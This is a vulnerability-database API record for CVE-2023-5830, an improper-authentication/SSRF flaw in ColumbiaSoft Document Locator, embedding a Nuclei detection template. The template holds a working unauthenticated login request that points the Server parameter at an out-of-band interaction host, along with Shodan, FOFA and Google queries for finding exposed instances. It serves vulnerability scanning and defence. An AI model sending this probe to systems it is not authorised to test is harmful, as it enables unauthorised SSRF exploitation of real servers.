{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2023-5830/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2023-5830/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2023-5830/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2023-5830/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2023-5830/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2023-5830"},"sightings":{"href":"/api/v1/sightings/cve-2023-5830"}},"enrichments":{"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2023/CVE-2023-5830.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2023-5830\n\ninfo:\n  name: ColumbiaSoft DocumentLocator - Improper Authentication\n  author: Gonski\n  severity: critical\n  description: |\n    Instances of ColumbiaSoft's Document Locator prior to version 7.2 SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF vulnerability. This template identifies vulnerable instances of the ColumbiaSoft Document Locater application by confirming external DNS interaction/lookups by modifying the value of the client-side SERVER parameter at /api/authentication/login.\n  impact: |\n    An attacker could exploit this vulnerability to gain unauthorized access to sensitive information.\n  remediation: |\n    Upgrade to a patched version of ColumbiaSoft DocumentLocator to fix the improper authentication issue.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-5830\n    - https://vuldb.com/?ctiid.243729\n    - https://github.com/advisories/GHSA-j89v-wm7x-4434\n    - https://vuldb.com/?id.243729\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2023-5830\n    cwe-id: CWE-287\n    epss-score: 0.60782\n    epss-percentile: 0.9911\n    cpe: cpe:2.3:a:documentlocator:document_locator:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: documentlocator\n    product: document_locator\n    shodan-query:\n      - 'title:\"Document Locator - WebTools\"'\n      - http.title:\"document locator - webtools\"\n    fofa-query: title=\"document locator - webtools\"\n    google-query: intitle:\"document locator - webtools\"\n  tags: cve,cve2023,ssrf,unauth,columbiasoft,intrusive,webtools,documentlocator,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        @timeout: 20s\n        POST /api/authentication/login HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json;charset=UTF-8\n        Origin: {{BaseURL}}\n        Referer: {{BaseURL}}\n\n        {\n          \"LoginType\":\"differentWindows\",\n          \"User\":\"{{randstr}}\",\n          \"Password\":\"{{rand_base(5, \"abc\")}}\",\n          \"Domain\":\"{{randstr}}\",\n          \"Server\":\"{{interactsh-url}}\",\n          \"Repository\":\"{{randstr}}\"\n        }\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"dns\"\n\n      - type: word\n        part: body\n        words:\n          - '\"Authorized\":false'\n# digest: 4b0a00483046022100a641d2a49b51a12e07db715d259c0f47005d0a615dd6edc7352d94bf3cab909a022100a41d859077c3c63b6feb83c307b38c05402c225a0e6cc7d00a9789e85ab74404:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2023-5830"}